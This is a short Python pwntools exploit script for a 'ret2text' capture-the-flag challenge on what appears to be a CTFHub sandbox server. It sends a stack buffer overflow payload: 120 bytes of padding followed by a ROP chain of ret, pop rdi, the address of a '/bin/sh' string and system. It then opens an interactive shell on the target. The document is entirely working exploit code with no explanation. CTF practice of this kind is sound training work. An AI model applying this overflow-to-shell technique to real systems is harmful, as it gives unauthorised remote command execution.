pwn-ret2text

from pwn import *
r = remote("challenge-4866f3c186b2dcc2.sandbox.ctfhub.com", 27658)
rdi = 0x4008a3
sys = 0x400620
sh = 0x4008cb
ret = 0x400285
payload = b'a'*(112+8)+p64(ret)+p64(rdi)+p64(sh)+p64(sys)
r.sendline(payload)
r.interactive()